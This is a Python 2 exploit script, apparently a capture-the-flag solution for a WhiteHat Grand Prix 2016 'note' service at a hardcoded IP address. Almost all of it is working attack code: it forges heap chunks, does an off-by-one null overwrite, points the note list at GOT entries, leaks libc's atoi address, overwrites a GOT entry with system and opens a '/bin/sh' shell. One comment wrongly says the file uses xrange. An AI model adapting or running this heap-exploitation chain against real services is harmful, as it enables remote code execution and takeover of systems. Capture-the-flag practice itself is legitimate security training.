# Pwn 500, WhiteHat Grand Prix 2016
from Pwn import *
# p = Pwn(elf='./note')
# Connection parameters for the challenge service; every read/write in this
# script goes through this helper object.
p = Pwn(elf='./note', host='118.70.186.203', port=23501)

# 64 32-bit words that, once packed with p.p32 and concatenated, form the
# 256-byte key table used by encrypt()/decrypt().
key_1 = [
    0xd49f6a35, 0xa8733e09, 0x7c4712dd, 0x501be6b1,
    0x24efba85, 0xf8c38e59, 0xcc97622d, 0xa06b3601,
    0x743f0ad5, 0x4813dea9, 0x1ce7b27d, 0xf0bb8651,
    0xc48f5a25, 0x98632ef9, 0x6c3702cd, 0x400bd6a1,
    0x14dfaa75, 0xe8b37e49, 0xbc87521d, 0x905b26f1,
    0x642ffac5, 0x3803ce99, 0x0cd7a26d, 0xe0ab7641,
    0xb47f4a15, 0x88531ee9, 0x5c27f2bd, 0x30fbc691,
    0x04cf9a65, 0xd8a36e39, 0xac77420d, 0x004b16e1,
    0x00000000, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x20202020, 0x20202020,
    0x20202020, 0x20202020, 0x20202020, 0x20202020,
    0x20202020, 0x20202020, 0x20202020, 0x20202020,
    0x20202020, 0x20202020, 0x20202020, 0x20202020,
    0x20202020, 0x0a202020, 0x6d202020, 0x20206d6d,
    0x20202020, 0x20202020, 0x20202020, 0x20202020,
    0x20202020, 0x20202020, 0x20202320, 0x6d6d6d6d,
]

# Expand the packed words into one int per byte.  The table is read as two
# 128-byte halves: encrypt()/decrypt() index it as key[(i % 128) + t] with
# t being 0 or 0x80.
key = [ord(c) for c in ''.join(p.p32(word) for word in key_1)]
def decrypt(data):
    """Hex-decode *data* and XOR it byte-wise against the key table.

    Same per-byte transform as encrypt(): a byte <= 0x7f is XORed with
    key[i % 128] and reduced mod 128; a byte > 0x7f is XORed with
    key[(i % 128) + 0x80] and left as is.  Returns the result as a str.
    Raises if *data* is not valid hex (str.decode('hex'), Python 2 only).
    """
    raw = [ord(ch) for ch in data.decode('hex')]
    plain = []
    for pos, byte in enumerate(raw):
        high = byte > 0x7f
        mixed = key[(pos % 128) + (0x80 if high else 0)] ^ byte
        if not high:
            mixed %= 128
        plain.append(chr(mixed % 256))
    return ''.join(plain)
def encrypt(data):
    """XOR *data* byte-wise against the key table and return upper-case hex.

    Same per-byte transform as decrypt(): a byte <= 0x7f is XORed with
    key[i % 128] and reduced mod 128; a byte > 0x7f is XORed with
    key[(i % 128) + 0x80] and left as is.  An empty input yields ''.
    Uses str.encode('hex'), so this is Python 2 only.
    """
    if not data:
        return ''
    out = []
    for pos, byte in enumerate(ord(ch) for ch in data):
        high = byte > 0x7f
        mixed = key[(pos % 128) + (0x80 if high else 0)] ^ byte
        if not high:
            mixed %= 128
        out.append(chr(mixed % 256))
    return ''.join(out).encode('hex').upper()
# The service's prompts arrive encrypted too, so the expected markers are
# precomputed once here and handed to p.read_until() by the helpers below.
# (data_note holds the 'Date #: ' prompt; the name is kept for the callers.)
(cmd, size_note, name_note, data_note,
 body_note, index_free, index_read, index_edit) = [
    encrypt(prompt) for prompt in (
        'cmd #:',
        'Enter size Note #: ',
        'Name Note #:',
        'Date #: ',
        'Body #: ',
        'Index Free#: ',
        'Index #:',
        'Index Edit#:',
    )
]
def list_note():
    """Send the ``list`` command and return the decrypted reply as one str.

    Waits for the command prompt, sends the encrypted command, reads up to
    the next prompt, then sends a bare newline (as the original dialogue
    does) before decrypting the reply line by line.
    """
    p.read_until(cmd)
    p.sendline(encrypt('list'))
    reply = p.read_until(cmd)
    p.sendline('\n')
    # Each line of the reply is its own hex-encoded ciphertext.
    return ''.join(decrypt(line) for line in reply.split('\n'))
def read_note(idx):
    """Send ``read`` for note *idx* and return the decrypted reply as one str.

    Follows the same prompt/answer dialogue as list_note(): command, then
    the index at the ``Index #:`` prompt, then everything up to the next
    command prompt is decrypted line by line.
    """
    p.read_until(cmd)
    p.sendline(encrypt('read'))
    p.read_until(index_read)
    p.sendline(encrypt(str(idx)))
    reply = p.read_until(cmd)
    p.sendline('\n')
    pieces = [decrypt(line) for line in reply.split('\n')]
    return ''.join(pieces)
def free_note(idx):
    """Walk the ``free`` dialogue for note *idx*; nothing is read back."""
    for prompt, answer in ((cmd, 'free'), (index_free, str(idx))):
        p.read_until(prompt)
        p.sendline(encrypt(answer))
def add_note(name, date, body, size):
    """Walk the ``add`` dialogue: size, then name, date and body.

    *size* is sent as str(size); every answer is passed through encrypt().
    Nothing is read back beyond the prompts themselves.
    """
    dialogue = (
        (cmd, 'add'),
        (size_note, str(size)),
        (name_note, name),
        (data_note, date),
        (body_note, body),
    )
    for prompt, answer in dialogue:
        p.read_until(prompt)
        p.sendline(encrypt(answer))
def edit_note(idx, name, date, body):
    """Walk the ``edit`` dialogue for note *idx*: index, then name, date, body.

    Mirrors add_note() minus the size prompt; every answer is passed
    through encrypt() and nothing is read back beyond the prompts.
    """
    dialogue = (
        (cmd, 'edit'),
        (index_edit, str(idx)),
        (name_note, name),
        (data_note, date),
        (body_note, body),
    )
    for prompt, answer in dialogue:
        p.read_until(prompt)
        p.sendline(encrypt(answer))
def exploit():
    """Run the scripted interaction against the service end to end.

    Connects, performs a fixed sequence of add/free/edit calls through the
    helpers above, reads note 11 back to pull a 4-byte value out of the
    reply, prints the derived numbers, sends one final edit and then hands
    the connection over to p.io().  p.pA, p.pack, p.unpack and
    p.get_libc_offset come from the external Pwn helper; their exact
    semantics are not visible in this file.
    """
    p.connect()
    add_note('A'*30,'C'*15,'D'*76,76)
    add_note('E'*30,'F'*15,'G'*460 + p.pack(0x41),464)
    add_note('F'*30,'Q'*15,'K'*208,208)
    add_note('T'*30,'M'*15,'K'*208,208)
    stage = 'D'*40 + p.pA(0,0x89)
    stage+= 'D'*4 + p.pack(0x804f6a0 - 8) #fake chunk->bck
    add_note('A'*30,'C'*15,stage,56)
    add_note('W'*30,'F'*15,'C'*79 + '\n',80)
    add_note('T'*30,'M'*15,'K'*208,208)
    free_note(1)
    edit_note(0,'A'*30,'C'*15,'K'*44) # overwrite note[1]->size
    add_note('T'*30,'F'*15,'C'*320,320)
    add_note('Y'*30,'F'*15,'C'*79 + '\n',80)
    free_note(1)
    free_note(2)
    stage1 = 'A'*320
    stage1+= p.pA(0,0x89)
    stage1+= 'A'*4 + 'C'*4
    stage1+= 'P'*(0x88 - 16)
    stage1+= p.pA(0,0x81)
    stage1 = stage1.ljust(464,'\xC0')
    add_note('E','F'*15,stage1,464) # overwrite note 7
    add_note('T'*30,'M'*15,'K'*208,208)
    free_note(7)
    free_note(5)
    # print list_note()
    stage1 = 'A'*320
    stage1+= p.pA(0,0x89) + 'A'*4 + '\n'
    edit_note(1,'X'*30,'Z'*15,stage1) # off byte null overwrite chunk->bck
    # after this add, notes->list = main_arena->bins 5 or 6
    add_note('K'*30,'F'*15,'C'*79 + '\n',80)
    stage3 = 'A'*4
    stage3+= p.pA(
        1,
        32,
        p.got['atoi'],
        1,
        32,
        p.got['strcspn']
    )
    stage3 = stage3.ljust(79,'C')
    add_note('A'*30,'F'*15,stage3 + '\n',80)
    out = read_note(11)
    # Take the 4 bytes that end at the first 0xf7 byte of the reply.
    # NOTE(review): find() returns -1 when that byte is absent; the slice
    # then becomes out[-4:0] == '' and p.unpack gets an empty string.
    # Nothing guards against that case.
    idx = out.find('\xf7')
    atoi = p.unpack(out[idx - 3:idx + 1])
    system = atoi - p.get_libc_offset(atoi,'atoi')
    # Python 2 print statements (the file also relies on xrange and
    # str.decode('hex')); it does not run under Python 3.
    print hex(atoi)
    print hex(system)
    # Final edit, performed inline rather than via edit_note(): only the
    # index and name prompts are answered here.
    p.read_until(cmd)
    p.sendline(encrypt('edit'))
    p.read_until(index_edit)
    p.sendline(encrypt(str(12)))
    p.read_until(name_note)
    payload = p.pack(system) + '\n'
    p.sendline(encrypt(payload))
    p.read_until(data_note)
    # Sent without encrypt(), unlike every other answer in this file --
    # presumably intentional at this point of the dialogue; confirm.
    p.sendline('/bin/sh')
    p.io()
# Script entry point: runs on import as well as on direct execution, since
# there is no __main__ guard.
exploit()